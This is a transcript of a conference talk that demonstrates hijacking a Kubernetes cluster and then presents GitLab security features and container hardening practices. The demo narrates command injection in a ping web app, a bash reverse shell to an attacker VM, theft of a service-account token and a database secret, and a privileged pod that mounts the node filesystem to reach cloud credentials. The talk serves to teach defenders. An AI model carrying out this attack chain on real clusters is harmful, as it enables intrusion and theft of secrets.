 Do you know how easy it is to hijack a Kubernetes cluster? Apparently fairly easy. In this talk, Nico will demonstrate how easy it is to hijack a Kubernetes cluster as well as how following basic security best practices can help protect you from being hijacked. He will also cover how implementing zero trust can prevent malicious workloads from being executed in the hijacked cluster. Nico is a Docker community leader, as well as a GitLab hero, frequently sharing his passion for cloud native and Kubernetes at various conferences and user group events. Nico is available on chat as well as all of our other speakers, so do feel free to chat with Nico, other speakers as well as the GitLab team members right now. Over to you, Nico. Hey, everyone, and welcome to my talk, how GitLab can save your Kubernetes environment from being hijacked. My name is Nico Meissenzahl. I'm senior cloud a different consultant at Witec. I'm located in Germany. I'm a GitLab hero, Microsoft MVP and Docker community lead, and my work is focused around Kubernetes, containers, cloud native, and DevOps technology. So yeah, the agenda for my talk today, first of all, we do a demo, and I will show you how easy it can be to hijack a Kubernetes cluster. And then we talk about how GitLab can help to prevent such attacks, and we will round up with some container and Kubernetes security best practices, some general stuff. Okay, so before I jump right into the demo, just some information or details on the demo itself. First of all, yeah, we will access a web application using our browser and then we'll try to check some code into the container, and basically then I'm able to somehow, yeah, in check even further from the container into the Kubernetes cluster gaining some privileges, yeah, high access level and stuff like this, and see what we can do. Okay, with that, let me switch to my demo application. So here, we basically have, yeah, our demo application, it's small application, small web app, the only thing the application is doing, I put in an IP address here, hit the go button, and what will happen is that the container or the application will run the ping command in the container and will output the details of the ping here. So pretty simple. So let's see, we're doing a ping command, we provided an IP address and we're getting an output. So it somehow looks that it's really just the ping command executed in the container. So maybe there's some security issues and maybe we can somehow, yeah, in check another command. So maybe let's try to check an echo. So we're doing just the IP address and then the semicolon and then doing an echo, I was here. Let's see if it works. Hit and go. And once again, we're seeing our command, we're seeing our ping output, and we're also seeing the output of our echo. So here we're seeing an I was here. So what you learned, we are somehow able to inject another command into our application and getting executed inside the container. So pretty cool. So with that, we somehow can try a bit more. So get back to the ping app and let's see if we can, yeah, verify whether there's a shell or a bash available in our container. So this time, we're just skipping the IP address because we don't want to ping, we just want to somehow inject into the container. So starting with the semicolon and just doing a witch and bash to see whether a bash is available in the container and if we can execute it. Okay, also looks good. So output is bin bash. So we haven't been and bash available under slash bin slash bash. So pretty cool so far. So with a bash, we would then now be able to get further and checked into our container by using a reverse shell. So basically open up a shell in our container, but doing this reverse. So not as you know, let's say it was an SSH or so you're connecting to the machine. And then executing commands, we're doing that the way around. So we will open up a port on a different machine. And then we will connect the container using ECROS traffic to our machine. And with this, we might get access into container and get a bash instead of the container. So let's let's try this. For this, we of course need a public access point. Just clear this one up here. So basically I just provided an virtual machine. It's on Azure. We have a public IP for this one so that we have an endpoint connect to here we'll use basically net cut. We need to execute this with misudo rights and just open up a port on port 80 with net cut. So now our application of our virtual machine is listening on port 80 on any IP addresses. So now we some only to inject the reverse shell and started inside our container to connect to our virtual machine. This is pretty easy. So here we will use this command. Once again, we have a semicolon, then we're starting a bash. And in that this bash, we are starting another bash. But this time, we are redirecting the bash to a TCP address and port. And this is basically the IP address of our virtual machine of our port 80. We just opened up and basically redirecting everything in there. If we're now starting while hitting the go button, it's loading and loading and loading. So somehow it looks like the application is broken. But let's see if it worked. And here we see we now have a bash open. We're getting some kind of errors here, but it doesn't matter. We now have a bash. And if I'm doing a list, we are in our container. So now we have the reverse shell open into our container. And from here, we can somehow dig a bit deeper. So let's see. Basically we are running on Kubernetes. So basically we somehow should have a service account available. So let's do an LS. We have a service account. We are seeing our certificates. We're getting our namespace. And we are full talking. So let's try to somehow talk to the Kubernetes API server. Maybe we have some Excel threads. OK. So first of all, we need to expose some stuff. First of all, we're exposing a token. So just doing a cut on the token file here. Then maybe just do an echo to see if everything is fine. So an echo on the token variable looks good. So we have a token here. Let's do the same one on certificate. Also doing a cut on this one here. We also have a certificate. Pretty fine so far. So let's try to connect to the Kubernetes API and see if we might have some Excel. Yeah. This time we do not have Qubectl at the moment. So we need to do it with Kerl. So here we are just doing a Kerl, providing a CA file. We are providing a header, also a station header with our barrier token from the token above. And then we actually are doing a get command on our Kubernetes service host and Kubernetes service ports. There is environments available inside our container without exposing it at all and then slash API. So let's see if it works. OK, we're getting some feedback. At least we do not get a deny. So at least we have somehow read access on our API. So in Kubernetes, which is pretty good. Because from there, we might be able to get some further details. So let's see. Next one, let us export the namespace and see which namespace we are running in. Or if it's default, or if it's another namespace. OK, so doing an echo in the namespace, we have the sample minus namespace, we are running in the container. We check that it's running in. OK, cool. So let's try if we can list the parts in this namespace. So maybe our results account has access to list them. So once again, we're doing a Kerl, providing our certificate, providing the barrier token. And here we do a get against APIs, version one, namespaces, providing namespaces from our variable above. And then try to get the parts. So let's execute this one. OK, here we're getting forbidden. So status is failure, part is forbidden, user, system, service account, sample minus namespace default. So basically, we're using the default account in the sample namespace. And this one does not have access to list pot resources in the namespace, sample minus namespace. And once again, we get the HTTP code, which basically tells us that we do not have access. So we are not able to list the parts in this namespace. Yeah, but hey, every Kubernetes last day has a default namespace. So maybe there was something misconfigured, some role bindings, roles somehow misconfigured. So let's try if we have access with this service account into the default namespace. So maybe this works. So we're doing exactly the same command. And just, yeah, instead of providing the namespace here, we are just going to the default namespace and executing this one. OK, this looks better. So we get some feedback. We do not get a deny. And we're almost here, yeah, part definition here. So we have some parts available here. Pretty cool. But it's a little bit hard to read. So let's see if we somehow get a nicer work and if we're able to somehow install or use kubectl. So first of all, let's see which user we are in this container. Ah, cool, we have root. So we have pretty high rights in this container. Let's do another check. And if we can curl Google, this also works. OK, so our container, we have write access and we have somehow access to the internet. So we can do an ECRS connection. So let's try to just download kubectl. Maybe it works. And then we would need to use curl anymore. We can do kubectl. It's pretty nice and so on. So we're downloading the latest release, making it executable and moving it to user bin. So let's see if this works. OK, download worked. So we now should have kubectl available. So then let's do kubectl.getPots into the default namespace because we saw we have access to the default namespace and see if we can get some feedback. And here we go. We have another container, another app running in our default namespace. And we are somehow at least able to see it here. So maybe let's dig a bit deeper and check out some of the configurations. So here we're doing kubectl.get. Again, output everything as YAML and crap for environment variables. So maybe we have some nice environment variables, user names, passwords, something like this. So let's see. Oh, OK, we have an environment variable which is called db underscore string. So it's not in clear text here, but somehow it's in secret. It's mounted into the container. OK, so two more options. We either check if we have access to the secret or we're trying if we can do an exec into the container and just read the environment variable. So let's try the second one. So here we're doing kubectl.exe in the default namespace just getting and trapping together the pod name here and then doing and to get the environment variables and then doing a crap on the db underscore string. So let's see if we are able to exit it. Hey, cool, it worked. And now we have the environment variable and the secret here. So with this, we can now try to connect to this database, try to export data, at least read data, maybe dump the data and upload it somewhere else. So pretty fast, so far. Cool, so we have the db string. So let's try something further. Let's try to schedule container in the cluster and see if we are able to somehow schedule containers and run our own workload in this Kubernetes cluster. We don't have access to. OK, so we also know that it's some more work that we are able to connect to the internet. So let's try to get the Ubuntu image from Docker Hub. And of course, we don't would like to just have an Ubuntu running with root access. Also, let's try to run it with privilege mode. So with this, we would have even further access rights. And there we're just starting a bash. And you're starting it in the background, then it's running. And we do need to care about updating the entry point and stuff like this. So just executing this one here. Also looks good. So let's see if we are seeing the pot here. It's the Ubuntu pot we just launched 10 seconds ago. And it's ready, and it's running. Cool, so this also worked. So let's do an exec here. And we're doing open up a bin bash in this container. So we now jump from our hijack container into our Ubuntu container. So here we have now a full Ubuntu available. We can install the tools and so on. And we also have privilege mode here. So with privilege mode, one option could also do is we could mount the file system from our node. From the Kubernetes road, this pot is running on. So let's do this one. We're having the mount command. We're just grabbing together the disk here from the node and mountain it into the container on slash TMP. Executing this. And now doing a list on TMP and see whether this works. Cool. Here we go, our file system from the Kubernetes node. We are running on. And here we can now have many, many more access. So we're doing maybe an list on TMP, ETC Kubernetes or the ETC Kubernetes directory of our node. And here we see we have an Azure JSON, for example. This one contains some secrets and client IDs and stuff, how the Kubernetes is talking to Azure. So we could even expose further into our public cloud environment, for example. We're getting certs, manifests and other information with those we could even further and check, or high check our Kubernetes cluster starting container outside of Kubernetes, maybe getting further access to the Kubernetes node and stuff like this. So we are pretty far into our Kubernetes cluster. OK, this was the short demo. And basically I would like to show you how easy it is to get access if there is somehow a security issue in a web application and you have not a really good protected Kubernetes cluster. Then it's really easy to get further access to use privileged service accounts if they are available to get even further. So I'm not a security expert. So this is just basic stuff. If you really know about Linux and Kubernetes and security, you can go even even further. So let's sum up. So what have we did? First of all, we injected some custom code in the text box of the web application, played around a bit, and then we opened up a reverse shell into the container. And from there, we used the privileged default service account to inspect secrets to schedule even a privileged pod. And from there, we could have gone even further. Very important, with this privileged pod, we would be able to access the node, we would be able to access the control pane, or even cloud resources, depending on the Kubernetes configuration. So I know if we would have secured this cluster, most of the text wouldn't work at all. But most of the time, if you are a customer site or a reviewing cluster, this is basically what you will get. A pretty open Kubernetes cluster, and then you will need to make sure that it's running secured and the application is also secured. Yeah, and this is where GitLab comes into place, because GitLab has many features which can help you to print lots of attacks. And this is I would like to talk about now. First of all, the GitLab features are combined in a whole DevOps strategy. So we have different DevOps stages, like plan, create, release, protect, and monitor, and some others. All of those stages, GitLab provides you with nice features which can help you to secure your whole application lifecycle and also secure your application, but also your Kubernetes cluster. So let's get some details here. For the create stage, basically, Justin, best practice, use pair programming. So make sure that the code you're committing or you're merging is the best as possible. So make sure maybe you're finding an anti-pattern or something, your colleague, you're working with together, directly finds it, you can fix it, even before somebody reads the metric as, for example. And to be honest, the security issue we used in this verification, pretty sure a senior developer would have found it directly. Second one, required match request approvals. This is a feature of GitLab where you can make sure that the match request needs an approval before it gets merged into the main branch, for example. So you can really make sure that somebody reviewed it. This set, it's a premium or ultimate feature. Optional match request approvals are available in all GitLab versions. Yeah, then we have the queue stage with lots of nice features we can use. First of all, we have secret detection. So we can GitLab verifies our Git history and find leaked secrets and passwords and stuff like this. So we make sure that we do not have any passwords and secrets on our code. And we have dependency scanning. So GitLab can analyze our dependencies and find vulnerabilities and make sure we are fixing them or updating our dependencies. This is also an ultimate feature. We have static application secure testing, which analyzes our source codes for security issues. Also, this one would have found our security issue in our web application. So basically, we would have found this bug in our, let's say, a CI pipeline, for example. We have dynamic application security testing. So once the further, basically, GitLab analyzes your running application and tries to find some security issues. This one is also an ultimate feature. And then last one, release from API fuzzing, which also helps to protect and test web APIs by fuzzing them, also an ultimate feature. But we have plenty of features and tools which can use to secure and test our application even before it's deployed into an environment. Yeah, and then we have the configure stage. Configure stage can help us scanning our containers. So we can basically, after we're building our containers, we can scan them and make sure that there are not any security issues, vulnerabilities, and stuff like this included. And we have autodefops, autodefops is a great feature which helps you basically to reduce complexity and basically start with all the nice features I showed you and integrate them as a pipeline, basically ready to go. So you get all the nice features out of the box. You just need to enable it. Yeah, pretty nice feature with autodefops, yeah. But we have even more stages available, protect stage. So here we basically have our running application, but in our Kubernetes cluster, but still GitLab provides us with features we can use. For example, the web application firewall. So web application for basically monitors and filters HTTP requests and attacks. So with this also based on our web app app we saw earlier, the code injection we did was a semi-core long and maybe echo or something. This would have been found by the web application firewall and we could have denied the request before it hits our container. We have container host security, also pretty nice feature. So basically it's also based on open source and basically prevents and detects commands and binaries executed in our container. And so with this we would have seen that somebody tries to run an echo or tries to run a bash in our container. And we could further deny this request. And also container network security, which is basically the same thing just for the network. So with this we could make sure that our container is not able to contact Google or to contact GitHub to download Qubectl. Or even if we somehow got access to the database secret, we could have make sure because this is a secret from a different container that the container we are in is not able to connect to the database. So even with the secret, we could have make sure with container network security that this container we are running in is not able to connect to the database. Yeah, so these are some of the GitLab features which could have you in this use case or it could have you to protect your applications, to protect your Kubernetes cluster. But basically to run up in the talk I would also would like to give you some container and Kubernetes best practices here. Yeah, basically first of all, understand the manifest you apply into your cluster. So the issue we had was having a default service account in Kubernetes having somehow access in a different namespace. This is basically nothing you would do because you shouldn't share any service accounts and even not if they have privileges to access the Kubernetes API. So most of the time I think this somebody applying any manifest he or she found on GitHub or in any documentation which are not production ready or something just could be pasted and implementing or they're applying some role bindings, roles and stuff like this. This is how those issues come up. You should deny untrusted registries. So basically we downloaded or pulled the Ubuntu image from Docker Hub. So we could deny the Docker Hub or other registries beside our own for example. We could enforce rootless containers so that we do not have root access inside our containers. We could have enforced read-only file systems at runtime. So basically with a read-only file system we wouldn't be able to execute all the stuff we did in our container. We could deny privileged container to make sure that we are able to mount or work against our Kubernetes nodes for example. We could have denied our ecosystem to not be able to talk to Google or to GitHub to download Qubectl for example. And even further if possible we could just use this rule as containers. So basically containers not containing Ubuntu distribution not containing a shell and stuff like this but just containing the parts the application needs. With this rule as container we wouldn't have ever started a bash inside our container to further get access to our Kubernetes cluster. Yeah, so basically this is some container Kubernetes bash practice really just the basic ones but to give you a better understanding what is important you have to run secure workload on a secured Kubernetes cluster. Yeah, with this my slides are available on Slideshare. All the code and how to set up the demo application is all available on GitLab. I also linked to the GitLab features and if you have any questions feel free to contact me via mail, via Twitter or everything else. With this, thanks for joining my talk and have a great day.